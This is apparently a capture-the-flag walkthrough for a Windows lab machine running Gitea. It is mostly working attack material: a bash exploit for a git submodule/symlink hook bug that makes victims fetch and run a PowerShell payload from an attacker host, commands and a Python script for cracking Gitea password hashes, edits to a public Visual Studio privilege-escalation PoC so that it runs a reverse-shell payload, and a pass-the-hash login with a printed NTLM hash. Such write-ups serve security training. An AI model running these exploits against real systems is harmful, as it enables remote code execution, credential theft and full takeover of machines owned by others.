scan

> TARGET=10.10.11.26 && nmap -p- -sC -sV -Pn -vvv -oN "nmap_tcp_all_${TARGET}.nmap" "$TARGET"
PORT     STATE SERVICE    REASON          VERSION
3000/tcp open  ppp?       syn-ack ttl 127
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=60e0d72f09805f61; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=iqXBYYObp5IQVb5gov_80slhSOw6MTcyMjgwNjY3MDM5NTEwMTEwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 04 Aug 2024 21:24:30 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-arc-green">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Git</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waWxlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=881bfc2361ac266e; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=4PF8_KZGVdhD8e83H7-I6DN-4GY6MTcyMjgwNjY3NTY0MzkyNjIwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 04 Aug 2024 21:24:35 GMT
|_    Content-Length: 0
5000/tcp open  upnp?      syn-ack ttl 127
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.12.3
|     Date: Sun, 04 Aug 2024 21:24:30 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5234
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Compiled - Code Compiling Services</title>
|     <!-- Bootstrap CSS -->
|     <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
|     <!-- Custom CSS -->
|     <style>
|     your custom CSS here */
|     body {
|     font-family: 'Ubuntu Mono', monospace;
|     background-color: #272822;
|     color: #ddd;
|     .jumbotron {
|     background-color: #1e1e1e;
|     color: #fff;
|     padding: 100px 20px;
|     margin-bottom: 0;
|     .services {
|   RTSPRequest:
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
5985/tcp open  http       syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open  pando-pub? syn-ack ttl 127

web enum

> t_web 10.10.11.26:3000
[09:28:01] Starting:
[09:28:04] 200 -    1KB - /.well-known/openid-configuration
[09:28:04] 200 -  206B  - /.well-known/security.txt
[09:28:06] 303 -   38B  - /admin  ->  /user/login
[09:28:06] 303 -   38B  - /admin/  ->  /user/login
[09:28:09] 200 -   16KB - /administrator
[09:28:09] 200 -   16KB - /administrator/
[09:28:10] 200 -  704B  - /api/swagger
[09:28:15] 303 -   41B  - /explore  ->  /explore/repos
[09:28:15] 200 -   40KB - /explore/repos
[09:28:16] 301 -   58B  - /favicon.ico  ->  /assets/img/favicon.png
[09:28:21] 303 -   38B  - /issues  ->  /user/login
[09:28:31] 200 -  297B  - /sitemap.xml
[09:28:34] 200 -   21KB - /test
[09:28:34] 200 -   21KB - /test/
[09:28:34] 200 -   21KB - /testing
[09:28:34] 200 -   21KB - /Testing
[09:28:35] 200 -   11KB - /user/login/
[09:28:36] 401 -   50B  - /v2/_catalog
[09:28:36] 401 -   50B  - /v2
[09:28:36] 401 -   50B  - /v2/

foothold

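#!/usr/bin/env bash
# Plants a git hook in Gitea repo "repo1" and wires it into "repo2" as a
# submodule whose checkout path (A/modules/x) collides, on a case-insensitive
# filesystem, with a symlink "a" -> ".git". When a victim clones repo2
# recursively with core.symlinks=true, repo1's y/hooks/post-checkout is
# written into .git/modules/x/y/hooks/ and git executes it, which fetches and
# runs shell.ps1 from the attacker host.
# This is the shape of the public PoC for the submodule/symlink hook bug fixed
# in git 2.45.1 (commonly referenced as CVE-2024-32002 — confirm against the
# advisory before citing it).
#
# Inputs (environment, defaults taken from the writeup):
#   ATTACKER  host serving shell.ps1 over HTTP
#   GITEA     base URL of the mtest user's repositories
# Requires push access to both repos as mtest and git user.name/email set.
set -euo pipefail

ATTACKER=${ATTACKER:-10.10.14.91}
GITEA=${GITEA:-http://gitea.compiled.htb:3000/mtest}

# These are written to ~/.gitconfig and persist after the script; revert them
# with `git config --global --unset <key>` when done. protocol.file.allow is
# only needed for local-path submodule URLs (not used here — kept from the
# original); core.symlinks lets git honour the symlink entry added below.
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main

rm -rf -- repo1 repo2

# repo1 carries the hook. The "y" directory matches the submodule name "x/y"
# used below, so the file lands in that submodule's hooks directory.
git clone "${GITEA}/repo1.git"
(
  cd repo1
  mkdir -p y/hooks
  # Unquoted heredoc so ${ATTACKER} expands; the PowerShell line has no $.
  cat > y/hooks/post-checkout <<EOF
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://${ATTACKER}/shell.ps1')
EOF
  chmod +x y/hooks/post-checkout
  git add y/hooks/post-checkout
  git commit -m "post-checkout"
  git push
)

# repo2: submodule at A/modules/x (name x/y) plus a symlink "a" -> ".git".
git clone "${GITEA}/repo2.git"
(
  cd repo2
  git submodule add --name x/y "${GITEA}/repo1.git" A/modules/x
  git commit -m "add-submodule"
  # Write the symlink entry (mode 120000) straight into the index so it is
  # committed without touching the working tree.
  blob=$(printf '.git' | git hash-object -w --stdin)
  printf '120000 %s 0\ta\n' "$blob" | git update-index --index-info
  git commit -m "add-symlink"
  git push
)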

user: emily

  • find the Gitea SQLite database at /c/Program Files/Gitea/data/gitea.db; its user table stores each password as a hex PBKDF2 hash plus a hex salt
  • rebuild each entry in hashcat's PBKDF2-HMAC-SHA256 format (mode 10900), `sha256:<iterations>:<base64(salt)>:<base64(hash)>`, base64-encoding the raw (unhexlified) salt and hash bytes, then crack it:
sha256:50000:In2HPMqJEDzYOpdr2sUkhg==:l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY=
> hashcat -a 0 -m 10900 hash.txt rockyou.txt
12345678
def pbkdf2_hash(password, salt, iterations=50000, dklen=50):
    """Derive PBKDF2-HMAC-SHA256 key material for one candidate password.

    The defaults (50000 rounds, 50-byte key) match the gitea.db entry
    dumped in this writeup.

    Args:
        password: candidate password as str; it is UTF-8 encoded before hashing.
        salt: raw salt bytes (the hex salt from gitea.db, unhexlified).
        iterations: PBKDF2 round count.
        dklen: derived key length in bytes (50 bytes == 100 hex characters).

    Returns:
        The derived key as bytes.
    """
    pw_bytes = password.encode('utf-8')
    return hashlib.pbkdf2_hmac('sha256', pw_bytes, salt, iterations, dklen=dklen)
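def find_matching_password(dictionary_file, target_hash, salt, iterations=50000, dklen=50):
    """Brute-force a PBKDF2-HMAC-SHA256 hash against a wordlist.

    Args:
        dictionary_file: path to a newline-separated wordlist (e.g. rockyou.txt).
        target_hash: hex-encoded derived key taken from gitea.db.
        salt: raw salt bytes (the hex salt from gitea.db, unhexlified).
        iterations: PBKDF2 round count.
        dklen: derived key length in bytes; must equal len(target_hash) // 2.

    Returns:
        The matching password as str (decoded with surrogateescape so non-UTF-8
        wordlist bytes survive a round trip), or None if nothing matched.

    Raises:
        ValueError: if target_hash does not decode to exactly dklen bytes; a
            mismatch would otherwise guarantee a silent "not found".

    Note: this is a pure-Python reference implementation. At 50000 rounds per
    candidate it is far slower than `hashcat -m 10900`, which is what the
    writeup actually used.
    """
    target_hash_bytes = binascii.unhexlify(target_hash)
    if len(target_hash_bytes) != dklen:
        raise ValueError(
            f"target_hash is {len(target_hash_bytes)} bytes, expected dklen={dklen}"
        )

    # Read raw bytes: lists like rockyou contain non-UTF-8 entries that would
    # make a text-mode open(encoding='utf-8') raise UnicodeDecodeError part way
    # through the file. Only the line terminator is stripped so passwords with
    # leading or trailing spaces are still tried.
    with open(dictionary_file, 'rb') as wordlist:
        for raw_line in wordlist:
            candidate = raw_line.rstrip(b'\r\n')
            derived = hashlib.pbkdf2_hmac('sha256', candidate, salt, iterations, dklen=dklen)
            if derived == target_hash_bytes:
                # backslashreplace keeps the print safe on any terminal encoding.
                print(f"Found password: {candidate.decode('utf-8', 'backslashreplace')}")
                return candidate.decode('utf-8', 'surrogateescape')

    print("Password not found.")
    return None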

# Parameters: both values come straight out of gitea.db (the emily account
# per this writeup). The salt is the hex salt column, target_hash the hex
# password column of a PBKDF2-SHA256 entry with 50000 rounds and a 50-byte key.
salt = bytes.fromhex('227d873cca89103cd83a976bdac52486')
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'
# Path to the wordlist (the writeup used rockyou).
dictionary_file = '/usr/share/wordlists/rockyou.txt'
find_matching_password(dictionary_file=dictionary_file, target_hash=target_hash, salt=salt)
  • the Gitea password is reused for the local Windows account: authenticate as emily:12345678 (e.g. with RunasCs.exe from the existing shell) to get a shell as emily

root

  • find VSStandardCollectorService150 and https://github.com/Wh04m1001/CVE-2024-20656
  • in main.cpp, point `cmd[]` at the collector binary installed on the target (adjust the Visual Studio edition/version to what is actually present):
WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
change CopyFile(L"c:\\windows\\system32\\cmd.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
to:
CopyFile(L"c:\\tmp\\e.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
  • compile to get Expl.exe; c:\tmp\e.exe is your own payload (e.g. a reverse-shell or add-admin executable) which the PoC copies over MofCompiler.exe so that it is executed with the service's elevated privileges instead of cmd.exe
  • note: the exploit needs the Windows Installer service running; start it first with `net start msiserver`

post

> evil-winrm -i 10.10.11.26 -u Administrator -H f75c95bc9312632edec46b607938061e

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack